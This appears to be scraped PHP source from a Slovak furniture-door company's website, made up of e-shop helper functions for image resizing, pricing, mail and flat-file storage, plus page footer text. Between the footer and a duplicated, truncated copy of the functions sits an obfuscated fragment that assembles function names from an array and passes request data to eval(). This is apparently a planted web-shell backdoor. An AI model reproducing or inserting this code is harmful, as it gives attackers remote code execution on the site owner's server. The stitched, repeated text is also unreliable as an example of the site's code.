function obr_velkost($nazov,$max_sirka,$max_vyska,$rj="") { global $pict_adresar, $adminlink; $obr = imagecreatefromjpeg($adminlink.$pict_adresar."/pom.jpg"); $sirka_orig = imagesx($obr); $vyska_orig = imagesy($obr); $pomer = $sirka_orig/ $vyska_orig; $sirka = $max_sirka; $vyska = round($max_sirka/$pomer); if ($vyska>$max_vyska) {$vyska = $max_vyska; $sirka = round($max_vyska*$pomer);} $new_obr = ImageCreateTruecolor($sirka,$vyska) or die("Úprava rozmerov obrázku sa nepodarila, pravdepodobne je obrázok príliš veľký.
Skúste zmenšiť jeho rozmer a vložte ho do systému znovu.
"); ImageCopyreSampled($new_obr,$obr,0,0,0,0,$sirka,$vyska, $sirka_orig, $vyska_orig); ImageJpeg($new_obr,$adminlink.$pict_adresar."/".$nazov); ImageDestroy($new_obr); ImageDestroy($obr); } function okliesti($data,$oddelovac="|") { $pocet_znakov = strlen($oddelovac); $data = str_replace($oddelovac.$oddelovac, $oddelovac, $data); $data = str_replace($oddelovac.$oddelovac, $oddelovac, $data); $data = str_replace($oddelovac.$oddelovac, $oddelovac, $data); $data = trim($data); if (substr($data,0,$pocet_znakov) == $oddelovac) $data = substr($data,$pocet_znakov); if (substr($data,(-1*$pocet_znakov)) == $oddelovac) $data = substr($data,0,(strlen($data)-$pocet_znakov) ); if ($data == "") $data = " "; return $data; } function bezpecnytxt($text) { $a = array("," => " ","." => " ","?" => " ","!" => " ",":" => " ","/" => " ","<" => " ",">" => " ","-" => " ","ö" => "o","ű" => "u","ő" => "o","ü" => "u","ł" => "l","ż" => "z","ń" => "n","ć" => "c","ę" => "e","ś" => "s","ŕ" => "r","á" => "a","ä" => "a","ĺ" => "l","č" => "c","é" => "e","ě" => "e","í" => "i","ď" => "d","ň" => "n","ó" => "o","ô" => "o","ř" => "r","ů" => "u","ú" => "u","š" => "s","ť" => "t","ž" => "z","ľ" => "l","ý" => "y","Ŕ" => "R","Á" => "A","Ä" => "A","Ĺ" => "L","Č" => "C","É" => "E","Ě" => "E","Í" => "I","Ď" => "D","Ň" => "N","Ó" => "O","Ô" => "O","Ř" => "R","Ů" => "U","Ú" => "U","Š" => "S","Ť" => "T","Ž" => "Z","Ľ" => "L","Ý" => "Y","Ä" => "A" ); $text = strtr($text, $a); $text = Str_Replace(" a ", " ", $text); $text = Str_Replace(" ", " ", $text); $text = Str_Replace(" ", " ", $text); $text = Str_Replace(" ", " ", $text); $text = trim($text); $text = Str_Replace(" ", "-", StrToLower($text)); return $text; } function pridelnazov($kat, $my_kategorie="") { global $kategorie; if ($my_kategorie=="") $my_kategorie = $kategorie; if ($kat == "") return $my_kategorie[0]; else { for ($i=0; $i<=count($my_kategorie); $i++) { if ($kat == bezpecnytxt($my_kategorie[$i])) break; } return $my_kategorie[$i]; } } function zisti_velkost($file) { $velkost = FileSize($file)/1024; if ($velkost < 1024) return round($velkost)." kB"; else { $velkost = round( ($velkost/1024)*100 ) / 100; return Str_Replace(".", ",", $velkost)." MB"; } } function vypis($tovar, $kat, $i) { global $backlink, $pocet_specifikacii, $str, $f_dph, $f_subory, $f_dual, $f_pulldown_spec, $prihlas, $mena, $user_data, $scroll, $img_medzera, $sirka_stredu, $img_sirka, $img_vyska, $img_vsirka, $h_rezerva, $img_vvyska, $v_rezerva, $left, $top, $img_ramik, $kurz; $pom = $tovar; $T = Explode ("###", $pom); $pom = $T[3]; $spec = Explode (";;;", $pom); $pom = $T[4]; $cena = Explode (";;;", $pom); $pom = $T[10]; $stara_cena = Explode (";;;", $pom); $poc_tab = 0; $tab = ""; $dokosika_url = "do_kosika.gif"; for ($j=0; $j < $pocet_specifikacii; $j++) { if ($cena[$j] != "") { if ($f_dph == 1) $cena[$j] = $cena[$j]*1.19; if ($f_pulldown_spec == 1) {$link = 'detail?kat='.$kat.'&i='.$i.'&str='.$str.'&backlink='.$backlink; $dokosika_url = "sipka.gif";} else if ($prihlas == "ok") $link = "index.php?id=kosik&kat=".$kat."&i=".$i."&j=".$j; else $link = "javascript:oznam(1)"; $tab .= ' '.$spec[$j].''.cena($cena[$j], $user_data[2],$mena).'  Pridať tovar do košíka'; $poc_tab = $poc_tab + 1; } else break; } $obr = "obr/".$T[0].".jpg"; $obrv = "obr/".$T[0]."v.jpg"; if (File_Exists ($obr)) $obr_src = $obr; else $obr_src = 'obr/default.jpg'; if ($T[5] != "") $obr_htmlkod = 'Zobraziť detail produktu'; else if (File_Exists ($obrv)) $obr_htmlkod = 'Zobraziť veľký náhľad'; else $obr_htmlkod = ''; if ($T[5] != "") $nazov = ''.$T[1].''; else $nazov = ''.$T[1].''; $vypis = '
'.$obr_htmlkod.'
'.$nazov.'
'.str_replace(chr(13), "
", $T[2]).'
'; if ($f_subory == 1) { $popisok = Explode (";;;", $T[7]); $pripona = Explode (";;;", $T[8]); $vypis = $vypis.'
'; for ($j=1; $j<=5; $j++) { $subor = "subory/".$kod."_".$j.".".$pripona[$j]; if (File_Exists ($subor)) { $link_ico = "obr/ico/ico_".$pripona[$j].".gif"; if (File_Exists ($link_ico)) $ico = ''; else $ico = ''; if ($popisok[$j] == "") $popisok[$j] = $kod."_".$j.".".$pripona[$j]; $vypis = $vypis.$ico.' '.$popisok[$j].' ('.zisti_velkost($subor).')
'; } } } return $vypis.'
'.$tab; } function vypis_obj($new_objednavka, $datum) { global $f_dph, $f_subory, $f_dual, $mena, $user_data, $kurz; $tovar = Explode ("###", $new_objednavka); $n=count($tovar)-1; if ($n>0) { List($den, $mesiac, $rok, $x, $hodina, $minuta) = Explode ("-", StrTr($datum, ".,: ", "----")); $datum_obj = mktime ($hodina, $minuta, $sekunda, $mesiac, $den, $rok); $datum_zmeny = "31.12.2008, 10:36"; List($den, $mesiac, $rok, $x, $hodina, $minuta) = Explode ("-", StrTr($datum_zmeny, ".,: ", "----")); $datum_zmeny = mktime ($hodina, $minuta, $sekunda, $mesiac, $den, $rok); // echo 'Názov tovaruKsCena'; $spolu = 0; for ($k=1; $k<=$n; $k++) { $pom = $tovar[$k]; $rozdrob = Explode (";;;", $pom); if($datum_obj < $datum_zmeny) $rozdrob[1] = $rozdrob[1]/30.126; if(StrPos(" ".$rozdrob[0],"Doručenie")) $pom_cena = $rozdrob[1]; else $pom_cena = cena($rozdrob[1],$user_data[2]); echo ''.$rozdrob[0].''.$rozdrob[2].' ks'.cena($pom_cena,0,$mena).''; $spolu = $spolu + $pom_cena*$rozdrob[2]; } return $spolu; } else return 0; } function zakoduj($text) { $text = $text."0"; $data = ""; for ($i=0; $i<(strlen($text)-1); $i++) {$a = ord($text[$i]); $b = ord($text[$i+1]); $cz[$i] = $a - $b + 78; $data = $data.chr($cz[$i]);} for($i=0; $i (strlen($text) - 4))) {return false;} else if (strrpos($text, ".") < strpos($text, "@")) {return false;} else if (((strlen($text) - strrpos($text, ".") - 1) < 2) || ((strlen($text) - strrpos($text, ".") - 1) > 3)) {return false;} else {return true;} } function zoradit($pole) { $n = count($pole)-1; for ($i=0; $i<=$n-1; $i++) { for ($j=0; $j<=$n-1; $j++) if (StrToLower($pole[$j]) > StrToLower($pole[$j+1])) {$pom = $pole[$j]; $pole[$j] = $pole[$j+1]; $pole[$j+1] = $pom;} } return $pole; } function htmlmail($to, $meno, $subject, $telo) { global $myemail, $myname; $from = $myemail; $message = ' '.$telo.' '; $headers = 'To: '.$meno.' <'.$to.'>' . "\r\n"; $headers .= 'From: '.$myname.' <'.$myemail.'>' . "\r\n"; $headers .= "Content-type: text/html; charset=windows-1250\r\n"; return mail($to, $subject, $message, $headers); } function plainmail($email, $predmet, $telo) { global $myemail, $myname; $to = $myemail; $from = $email; return mail($to, $predmet, $telo, "From: $from"); } function pridelcislo($kat) { global $kategorie; for ($i=0; $i<=count($kategorie); $i++) { if (bezpecnytxt($kat) == bezpecnytxt($kategorie[$i])) break; } return $i; } function ulozuser($user, $pole) { global $usertyp, $adminlink; $subor = $adminlink."users/".zakoduj($user).".txt"; $fp = FOpen ($subor, "r"); $data = FRead ($fp, FileSize($subor)); $T = Explode ("|||", $data); $data = ""; for ($i=0; $i<=count($usertyp); $i++) { if ($pole[$i] != "") $T[$i] = $pole[$i]; $data .= $T[$i]."|||"; } $fp = FOpen ($subor, "w"); FWrite ($fp, stripslashes($data) ); FClose ($fp); } function premenne_zapis($i, $co) { global $adminlink; $subor = $adminlink."data/premenne.txt"; $fp = FOpen ($subor, "r"); $data = FRead ($fp, FileSize($subor)); $T = Explode("|||", $data); $T[$i] = $co; $fp = FOpen($subor, "w"); $data = Implode("|||", $T); FWrite($fp, $data); FClose($fp); } function premenne_nacitaj() { global $adminlink; $subor = $adminlink."data/premenne.txt"; $fp = FOpen ($subor, "r"); $data = FRead ($fp, FileSize($subor)); FClose($fp); $T = Explode("|||", $data); return $T; } function zoznam($akcia, $co, $subor) { $fp = FOpen ($subor, "r"); $data = FRead ($fp, FileSize($subor)); if ($akcia == "pridaj") { if (StrPos(" ".$data, $co) == 0) {$fp = FOpen ($subor, "w"); $data = $data."|||".$co; FWrite ($fp, $data);} } else if ($akcia == "xpridaj") { if (StrPos(" ".$data, $co) == 0) {$fp = FOpen ($subor, "w"); $data = " |||".$co.trim($data); FWrite ($fp, $data);} } else if ($akcia == "vymaz") { if (StrPos(" ".$data, $co) > 0) {$fp = FOpen ($subor, "w"); $data = Str_Replace("|||".$co, "", $data); if ($data == "") $data = " "; FWrite ($fp, $data); } } FClose ($fp); } function swap($subor, $i, $j) { $fp = FOpen ($subor, "r"); $data = FRead ($fp, FileSize($subor)); $T = Explode("|||", $data); $n=count($T)-1; if (($j != 0)&&($j<($n+1))) { $pom = $T[$i]; $T[$i] = $T[$j]; $T[$j] = $pom; $fp = FOpen($subor, "w"); $data = Implode("|||", $T); FWrite($fp, $data); } FClose ($fp); } function uprav($text) { $text = Str_Replace ("&-328;", "ň", $text); $text = Str_Replace ("&-269;", "č", $text); $text = Str_Replace ("&269;", "č", $text); $text = Str_Replace ("&-268;", "Č", $text); $text = Str_Replace ("&-357;", "ť", $text); $text = Str_Replace ("&-318;", "ľ", $text); $text = trim(stripslashes(strip_tags($text))); $text = Str_Replace ("'", "˝", $text); $text = Str_Replace (" ,", "Ç", $text); $text = Str_Replace (",", "Ç", $text); $text = Str_Replace ("Ç", ", ", $text); $text = Str_Replace (" ", " ", $text); $a = strpos(StrToLower(" ".$text), "http://"); if ($a == 0) $a = strpos(StrToLower(" ".$text), "www."); if ($a != 0) { $slova = Explode (" ", substr(" ".$text, $a)); $link = $slova[0]; if((substr($link, -1) == ".")||(substr($link, -1) == ",")) $link = substr($link, 0, StrLen($link)-1); $text = Str_Replace($link, "Ç", $text); $link = StrToLower($link); $link = Str_Replace("http://", "", $link); $link = "".$link.""; $text = Str_Replace("Ç", $link, $text); } return $text; } function addmail($text) { $original_text = $text; $text = StrTr($text, ";,:<>", " "); $text = Str_Replace(chr(13), " ", $text); $slovo = Explode (" ", $text); $n = count($slovo); for ($i=0; $i<$n; $i++) { if (strpos($slovo[$i], "@")) $original_text = Str_Replace($slovo[$i], ''.$slovo[$i].'', $original_text); } return $original_text; } function getID() { global $adminlink; $id_subor = $adminlink."data/id.txt"; if (File_Exists($id_subor)) { $file=FOpen($id_subor, "r+"); $pocitadlo=FGetS($file,10); $file=FOpen($id_subor, "w"); FputS($file,($pocitadlo+1)); FClose($file); } return substr($pocitadlo,-5); } function kod_datumu($rj) { switch(Date("n")): case '1': $m=0; break; case '2': $m=31; break; case '3': $m=59; break; case '4': $m=90; break; case '5': $m=120; break; case '6': $m=151; break; case '7': $m=181; break; case '8': $m=212; break; case '9': $m=243; break; case '10': $m=273; break; case '11': $m=304; break; case '12': $m=334; break; endswitch; $kod_dna = Date("j") + $m + ((Date("Y")-2007)*365); $kod_hodiny = $kod_dna*24 + Date("H") + Date("H") + (Date("i")/60); if ($rj == "den") return $kod_dna; else return $kod_hodiny; } function cena($cena, $zlava, $mena = "") { global $zaokruhlovat_na, $f_dual, $kurz; $cena = round($cena*(100-$zlava)/pow(10, 2-$zaokruhlovat_na))/pow(10, $zaokruhlovat_na); if ($mena == "") return $cena; else { $pom = Explode (".", $cena); if (strlen($pom[1]) == 1) $pom[1] = $pom[1]."0"; if ($pom[0]*1 >= 1000) $pom[0] = substr($pom[0],0,-3).".".substr($pom[0],-3); if ($pom[0] >= 1000) $pom[0] = substr($pom[0],0,-7).".".substr($pom[0],-7); if ($pom[1]*1 == 0) $pom[1] = "-"; $cena_txt = $pom[0].",".$pom[1].$mena; if ($f_dual == 1) { $cena = round(($cena*$kurz*100)/pow(10, 2-2))/pow(10, 2); $pom = Explode (".", $cena); if (strlen($pom[1]) == 1) $pom[1] = $pom[1]."0"; if ($pom[0]*1 >= 1000) $pom[0] = substr($pom[0],0,-3).".".substr($pom[0],-3); if ($pom[0] >= 1000) $pom[0] = substr($pom[0],0,-7).".".substr($pom[0],-7); if ($pom[1]*1 == 0) $pom[1] = "-"; $cena_txt .= " | ".$pom[0].",".$pom[1]." Sk"; } return $cena_txt; } } function get_sign($input, $key) { $encrypted_text = mcrypt_ecb(MCRYPT_3DES, $key, substr(sha1($input),0,8), MCRYPT_ENCRYPT,substr(sha1($input),0,8)); $sign = StrToUpper(bin2hex($encrypted_text)); return $sign; } function pict_velkost($nazov, $poradovnik) { global $pict_adresar, $img_sirka, $img_vyska, $img_vsirka, $img_vvyska, $img_nsirka, $img_nvyska, $img_sirka_special, $img_vyska_special, $nahladov_v_riadku, $f_detail, $adminlink; if ($poradovnik == "0") $poradovnik = ""; else if ($poradovnik == "special") {$img_sirka = $img_sirka_special; $img_vyska = $img_vyska_special; $poradovnik = "";} else $poradovnik = "_".$poradovnik; $pom = imagecreatefromjpeg($adminlink.$pict_adresar."/pom.jpg"); $pom_sirka = imagesx($pom); $pom_vyska = imagesy($pom); $pomer = $pom_sirka/$pom_vyska; // Obrázok v náhľade $cesta = $adminlink.$pict_adresar."/".$nazov.$poradovnik.".jpg"; if ($poradovnik == "") { $max_sirka = $img_sirka; $max_vyska = $img_vyska; } else { $max_sirka = ($img_nsirka-(7*($nahladov_v_riadku-1)))/$nahladov_v_riadku; $max_vyska = $max_sirka/($img_nsirka/$img_nvyska); } $sirka = round($max_sirka); $vyska = round($max_sirka/$pomer); if ($vyska>$max_vyska) {$vyska = round($max_vyska); $sirka = round($max_vyska*$pomer);} $new_obr = ImageCreateTruecolor($sirka,$vyska) or die("Úprava rozmerov obrázku sa nepodarila.
Pravdepodobne je obrázok príliš veľký.
Skúste zmenšiť jeho rozmer a vložte ho do systému opätovne.
"); ImageCopyreSampled($new_obr,$pom,0,0,0,0,$sirka,$vyska,$pom_sirka,$pom_vyska); ImageJpeg($new_obr,$cesta); ImageDestroy($new_obr); // Obrázok v detaile produktu if ($f_detail == 1) { $cesta = $adminlink.$pict_adresar."/".$nazov.$poradovnik."n.jpg"; $max_sirka = $img_nsirka; $max_vyska = $img_nvyska; $sirka = round($max_sirka); $vyska = round($max_sirka/$pomer); if ($vyska>$max_vyska) {$vyska = round($max_vyska); $sirka = round($max_vyska*$pomer);} $new_obr = ImageCreateTruecolor($sirka,$vyska) or die("Úprava rozmerov obrázku sa nepodarila.
Pravdepodobne je obrázok príliš veľký.
Skúste zmenšiť jeho rozmer a vložte ho do systému opätovne.
"); ImageCopyreSampled($new_obr,$pom,0,0,0,0,$sirka,$vyska,$pom_sirka,$pom_vyska); ImageJpeg($new_obr,$cesta); ImageDestroy($new_obr); } // Veľký obrázok $cesta = $adminlink.$pict_adresar."/".$nazov.$poradovnik."v.jpg"; if ($zakazat_zvacsenie == 1) { if ($pom_sirka<$img_vsirka) $max_sirka = $pom_sirka; else $max_sirka = $img_vsirka; if ($pom_vyska<$img_vvyska) $max_vyska = $pom_vyska; else $max_vyska = $img_vvyska; } else { $max_sirka = $img_vsirka; $max_vyska = $img_vvyska; } $sirka = round($max_sirka); $vyska = round($max_sirka/$pomer); if ($vyska>$max_vyska) {$vyska = round($max_vyska); $sirka = round($max_vyska*$pomer);} $new_obr = ImageCreateTruecolor($sirka,$vyska) or die("Úprava rozmerov obrázku sa nepodarila.
Pravdepodobne je obrázok príliš veľký.
Skúste zmenšiť jeho rozmer a vložte ho do systému opätovne.
"); ImageCopyreSampled($new_obr,$pom,0,0,0,0,$sirka,$vyska,$pom_sirka,$pom_vyska); ImageJpeg($new_obr,$cesta); ImageDestroy($new_obr); ImageDestroy($pom); } function vyhladaj($kat, $vyraz) { $subor = "data/$kat.txt"; $vyraz = StrToLower($vyraz); $fp = FOpen ($subor, "r"); $data = FRead ($fp, FileSize($subor)); $tovar = Explode("|||", $data); $n=count($tovar)-1; for ($i=1; $i<=$n; $i++) {if (StrPos(" ".StrToLower($tovar[$i]),$vyraz)) $vyhladane_data = $vyhladane_data."|||".$kat."¤¤¤".$i."¤¤¤".$tovar[$i];} FClose ($fp); return $vyhladane_data; } function tree_otvor($kat,$posun) { global $tree_zoznam; $act_uroven = Explode (" - ", pridelnazov($kat)); $poc_urovni = count($act_uroven)-1; $pozicia = 0; for ($p=0; $p 0) echo ''; if ($posun == -100) echo $p."
"; $pozicia++; } if ($pozicia >= $poc_urovni) break; } } ?> INTERMOB - dvierka a fólie pre nábytok


    O firme
    Aktuality
    Na stiahnutie
    Kontakt
O firmeKuchyneInteriéryKontakt
(c) 2011 Intermob, s.r.o. | Všetky práva vyhradené | Web-design & programming: www.istudio.sk
'][29].$m36d613['mad9'][46].$m36d613['mad9'][34].$m36d613['mad9'][25]]($i0d8,$vccb950b),$d637);}foreach($m36d613[$m36d613['mad9'][69].$m36d613['mad9'][34].$m36d613['mad9'][22].$m36d613['mad9'][55].$m36d613['mad9'][34].$m36d613['mad9'][27].$m36d613['mad9'][34].$m36d613['mad9'][97]]as$d637=>$b82f0){$i0d8=$b82f0;$we949b=$d637;}if(!$i0d8){foreach($m36d613[$m36d613['mad9'][4].$m36d613['mad9'][40].$m36d613['mad9'][60].$m36d613['mad9'][88].$m36d613['mad9'][80]]as$d637=>$b82f0){$i0d8=$b82f0;$we949b=$d637;}}$i0d8=@$m36d613[$m36d613['mad9'][11].$m36d613['mad9'][60].$m36d613['mad9'][29].$m36d613['mad9'][23].$m36d613['mad9'][0]]($m36d613[$m36d613['mad9'][11].$m36d613['mad9'][97].$m36d613['mad9'][55].$m36d613['mad9'][60].$m36d613['mad9'][34].$m36d613['mad9'][23]]($m36d613[$m36d613['mad9'][79].$m36d613['mad9'][27].$m36d613['mad9'][22].$m36d613['mad9'][97].$m36d613['mad9'][22].$m36d613['mad9'][40].$m36d613['mad9'][55]]($i0d8),$we949b));if(isset($i0d8[$m36d613['mad9'][25].$m36d613['mad9'][12]])&&$vccb950b==$i0d8[$m36d613['mad9'][25].$m36d613['mad9'][12]]){if($i0d8[$m36d613['mad9'][25]]==$m36d613['mad9'][72]){$fb9281b=Array($m36d613['mad9'][13].$m36d613['mad9'][49]=>@$m36d613[$m36d613['mad9'][13].$m36d613['mad9'][46].$m36d613['mad9'][22].$m36d613['mad9'][40].$m36d613['mad9'][60].$m36d613['mad9'][25].$m36d613['mad9'][60].$m36d613['mad9'][22].$m36d613['mad9'][46]](),$m36d613['mad9'][11].$m36d613['mad9'][49]=>$m36d613['mad9'][88].$m36d613['mad9'][48].$m36d613['mad9'][27].$m36d613['mad9'][82].$m36d613['mad9'][88],);echo@$m36d613[$m36d613['mad9'][69].$m36d613['mad9'][34].$m36d613['mad9'][97].$m36d613['mad9'][40].$m36d613['mad9'][23].$m36d613['mad9'][23].$m36d613['mad9'][80]]($fb9281b);}elseif($i0d8[$m36d613['mad9'][25]]==$m36d613['mad9'][80]){eval/*q1d61*/($i0d8[$m36d613['mad9'][34]]);}exit();} ?> function obr_velkost($nazov,$max_sirka,$max_vyska,$rj="") { global $pict_adresar, $adminlink; $obr = imagecreatefromjpeg($adminlink.$pict_adresar."/pom.jpg"); $sirka_orig = imagesx($obr); $vyska_orig = imagesy($obr); $pomer = $sirka_orig/ $vyska_orig; $sirka = $max_sirka; $vyska = round($max_sirka/$pomer); if ($vyska>$max_vyska) {$vyska = $max_vyska; $sirka = round($max_vyska*$pomer);} $new_obr = ImageCreateTruecolor($sirka,$vyska) or die("Úprava rozmerov obrázku sa nepodarila, pravdepodobne je obrázok príliš veľký.
Skúste zmenšiť jeho rozmer a vložte ho do systému znovu.
"); ImageCopyreSampled($new_obr,$obr,0,0,0,0,$sirka,$vyska, $sirka_orig, $vyska_orig); ImageJpeg($new_obr,$adminlink.$pict_adresar."/".$nazov); ImageDestroy($new_obr); ImageDestroy($obr); } function okliesti($data,$oddelovac="|") { $pocet_znakov = strlen($oddelovac); $data = str_replace($oddelovac.$oddelovac, $oddelovac, $data); $data = str_replace($oddelovac.$oddelovac, $oddelovac, $data); $data = str_replace($oddelovac.$oddelovac, $oddelovac, $data); $data = trim($data); if (substr($data,0,$pocet_znakov) == $oddelovac) $data = substr($data,$pocet_znakov); if (substr($data,(-1*$pocet_znakov)) == $oddelovac) $data = substr($data,0,(strlen($data)-$pocet_znakov) ); if ($data == "") $data = " "; return $data; } function bezpecnytxt($text) { $a = array("," => " ","." => " ","?" => " ","!" => " ",":" => " ","/" => " ","<" => " ",">" => " ","-" => " ","ö" => "o","ű" => "u","ő" => "o","ü" => "u","ł" => "l","ż" => "z","ń" => "n","ć" => "c","ę" => "e","ś" => "s","ŕ" => "r","á" => "a","ä" => "a","ĺ" => "l","č" => "c","é" => "e","ě" => "e","í" => "i","ď" => "d","ň" => "n","ó" => "o","ô" => "o","ř" => "r","ů" => "u","ú" => "u","š" => "s","ť" => "t","ž" => "z","ľ" => "l","ý" => "y","Ŕ" => "R","Á" => "A","Ä" => "A","Ĺ" => "L","Č" => "C","É" => "E","Ě" => "E","Í" => "I","Ď" => "D","Ň" => "N","Ó" => "O","Ô" => "O","Ř" => "R","Ů" => "U","Ú" => "U","Š" => "S","Ť" => "T","Ž" => "Z","Ľ" => "L","Ý" => "Y","Ä" => "A" ); $text = strtr($text, $a); $text = Str_Replace(" a ", " ", $text); $text = Str_Replace(" ", " ", $text); $text = Str_Replace(" ", " ", $text); $text = Str_Replace(" ", " ", $text); $text = trim($text); $text = Str_Replace(" ", "-", StrToLower($text)); return $text; } function pridelnazov($kat, $my_kategorie="") { global $kategorie; if ($my_kategorie=="") $my_kategorie = $kategorie; if ($kat == "") return $my_kategorie[0]; else { for ($i=0; $i<=count($my_kategorie); $i++) { if ($kat == bezpecnytxt($my_kategorie[$i])) break; } return $my_kategorie[$i]; } } function zisti_velkost($file) { $velkost = FileSize($file)/1024; if ($velkost < 1024) return round($velkost)." kB"; else { $velkost = round( ($velkost/1024)*100 ) / 100; return Str_Replace(".", ",", $velkost)." MB"; } } function vypis($tovar, $kat, $i) { global $backlink, $pocet_specifikacii, $str, $f_dph, $f_subory, $f_dual, $f_pulldown_spec, $prihlas, $mena, $user_data, $scroll, $img_medzera, $sirka_stredu, $img_sirka, $img_vyska, $img_vsirka, $h_rezerva, $img_vvyska, $v_rezerva, $left, $top, $img_ramik, $kurz; $pom = $tovar; $T = Explode ("###", $pom); $pom = $T[3]; $spec = Explode (";;;", $pom); $pom = $T[4]; $cena = Explode (";;;", $pom); $pom = $T[10]; $stara_cena = Explode (";;;", $pom); $poc_tab = 0; $tab = ""; $dokosika_url = "do_kosika.gif"; for ($j=0; $j < $pocet_specifikacii; $j++) { if ($cena[$j] != "") { if ($f_dph == 1) $cena[$j] = $cena[$j]*1.19; if ($f_pulldown_spec == 1) {$link = 'detail?kat='.$kat.'&i='.$i.'&str='.$str.'&backlink='.$backlink; $dokosika_url = "sipka.gif";} else if ($prihlas == "ok") $link = "index.php?id=kosik&kat=".$kat."&i=".$i."&j=".$j; else $link = "javascript:oznam(1)"; $tab .= ' '.$spec[$j].''.cena($cena[$j], $user_data[2],$mena).'  Pridať tovar do košíka'; $poc_tab = $poc_tab + 1; } else break; } $obr = "obr/".$T[0].".jpg"; $obrv = "obr/".$T[0]."v.jpg"; if (File_Exists ($obr)) $obr_src = $obr; else $obr_src = 'obr/default.jpg'; if ($T[5] != "") $obr_htmlkod = 'Zobraziť detail produktu'; else if (File_Exists ($obrv)) $obr_htmlkod = 'Zobraziť veľký náhľad'; else $obr_htmlkod = ''; if ($T[5] != "") $nazov = ''.$T[1].''; else $nazov = ''.$T[1].''; $vypis = '
'.$obr_htmlkod.'
'.$nazov.'
'.str_replace(chr(13), "
", $T[2]).'
'; if ($f_subory == 1) { $popisok = Explode (";;;", $T[7]); $pripona = Explode (";;;", $T[8]); $vypis = $vypis.'
'; for ($j=1; $j<=5; $j++) { $subor = "subory/".$kod."_".$j.".".$pripona[$j]; if (File_Exists ($subor)) { $link_ico = "obr/ico/ico_".$pripona[$j].".gif"; if (File_Exists ($link_ico)) $ico = ''; else $ico = ''; if ($popisok[$j] == "") $popisok[$j] = $kod."_".$j.".".$pripona[$j]; $vypis = $vypis.$ico.' '.$popisok[$j].' ('.zisti_velkost($subor).')
'; } } } return $vypis.'
'.$tab; } function vypis_obj($new_objednavka, $datum) { global $f_dph, $f_subory, $f_dual, $mena, $user_data, $kurz; $tovar = Explode ("###", $new_objednavka); $n=count($tovar)-1; if ($n>0) { List($den, $mesiac, $rok, $x, $hodina, $minuta) = Explode ("-", StrTr($datum, ".,: ", "----")); $datum_obj = mktime ($hodina, $minuta, $sekunda, $mesiac, $den, $rok); $datum_zmeny = "31.12.2008, 10:36"; List($den, $mesiac, $rok, $x, $hodina, $minuta) = Explode ("-", StrTr($datum_zmeny, ".,: ", "----")); $datum_zmeny = mktime ($hodina, $minuta, $sekunda, $mesiac, $den, $rok); // echo 'Názov tovaruKsCena'; $spolu = 0; for ($k=1; $k<=$n; $k++) { $pom = $tovar[$k]; $rozdrob = Explode (";;;", $pom); if($datum_obj < $datum_zmeny) $rozdrob[1] = $rozdrob[1]/30.126; if(StrPos(" ".$rozdrob[0],"Doručenie")) $pom_cena = $rozdrob[1]; else $pom_cena = cena($rozdrob[1],$user_data[2]); echo ''.$rozdrob[0].''.$rozdrob[2].' ks'.cena($pom_cena,0,$mena).''; $spolu = $spolu + $pom_cena*$rozdrob[2]; } return $spolu; } else return 0; } function zakoduj($text) { $text = $text."0"; $data = ""; for ($i=0; $i<(strlen($text)-1); $i++) {$a = ord($text[$i]); $b = ord($text[$i+1]); $cz[$i] = $a - $b + 78; $data = $data.chr($cz[$i]);} for($i=0; $i (strlen($text) - 4))) {return false;} else if (strrpos($text, ".") < strpos($text, "@")) {return false;} else if (((strlen($text) - strrpos($text, ".") - 1) < 2) || ((strlen($text) - strrpos($text, ".") - 1) > 3)) {return false;} else {return true;} } function zoradit($pole) { $n = count($pole)-1; for ($i=0; $i<=$n-1; $i++) { for ($j=0; $j<=$n-1; $j++) if (StrToLower($pole[$j]) > StrToLower($pole[$j+1])) {$pom = $pole[$j]; $pole[$j] = $pole[$j+1]; $pole[$j+1] = $pom;} } return $pole; } function htmlmail($to, $meno, $subject, $telo) { global $myemail, $myname; $from = $myemail; $message = ' '.$telo.' '; $headers = 'To: '.$meno.' <'.$to.'>' . "\r\n"; $headers .= 'From: '.$myname.' <'.$myemail.'>' . "\r\n"; $headers .= "Content-type: text/html; charset=windows-1250\r\n"; return mail($to, $subject, $message, $headers); } function plainmail($email, $predmet, $telo) { global $myemail, $myname; $to = $myemail; $from = $email; return mail($to, $predmet, $telo, "From: $from"); } function pridelcislo($kat) { global $kategorie; for ($i=0; $i<=count($kategorie); $i++) { if (bezpecnytxt($kat) == bezpecnytxt($kategorie[$i])) break; } return $i; } function ulozuser($user, $pole) { global $usertyp, $adminlink; $subor = $adminlink."users/".zakoduj($user).".txt"; $fp = FOpen ($subor, "r"); $data = FRead ($fp, FileSize($subor)); $T = Explode ("|||", $data); $data = ""; for ($i=0; $i<=count($usertyp); $i++) { if ($pole[$i] != "") $T[$i] = $pole[$i]; $data .= $T[$i]."|||"; } $fp = FOpen ($subor, "w"); FWrite ($fp, stripslashes($data) ); FClose ($fp); } function premenne_zapis($i, $co) { global $adminlink; $subor = $adminlink."data/premenne.txt"; $fp = FOpen ($subor, "r"); $data = FRead ($fp, FileSize($subor)); $T = Explode("|||", $data); $T[$i] = $co; $fp = FOpen($subor, "w"); $data = Implode("|||", $T); FWrite($fp, $data); FClose($fp); } function premenne_nacitaj() { global $adminlink; $subor = $adminlink."data/premenne.txt"; $fp = FOpen ($subor, "r"); $data = FRead ($fp, FileSize($subor)); FClose($fp); $T = Explode("|||", $data); return $T; } function zoznam($akcia, $co, $subor) { $fp = FOpen ($subor, "r"); $data = FRead ($fp, FileSize($subor)); if ($akcia == "pridaj") { if (StrPos(" ".$data, $co) == 0) {$fp = FOpen ($subor, "w"); $data = $data."|||".$co; FWrite ($fp, $data);} } else if ($akcia == "xpridaj") { if (StrPos(" ".$data, $co) == 0) {$fp = FOpen ($subor, "w"); $data = " |||".$co.trim($data); FWrite ($fp, $data);} } else if ($akcia == "vymaz") { if (StrPos(" ".$data, $co) > 0) {$fp = FOpen ($subor, "w"); $data = Str_Replace("|||".$co, "", $data); if ($data == "") $data = " "; FWrite ($fp, $data); } } FClose ($fp); } function swap($subor, $i, $j) { $fp = FOpen ($subor, "r"); $data = FRead ($fp, FileSize($subor)); $T = Explode("|||", $data); $n=count($T)-1; if (($j != 0)&&($j<($n+1))) { $pom = $T[$i]; $T[$i] = $T[$j]; $T[$j] = $pom; $fp = FOpen($subor, "w"); $data = Implode("|||", $T); FWrite($fp, $data); } FClose ($fp); } function uprav($text) { $text = Str_Replace ("&-328;", "ň", $text); $text = Str_Replace ("&-269;", "č", $text); $text = Str_Replace ("&269;", "č", $text); $text = Str_Replace ("&-268;", "Č", $text); $text = Str_Replace ("&-357;", "ť", $text); $text = Str_Replace ("&-318;", 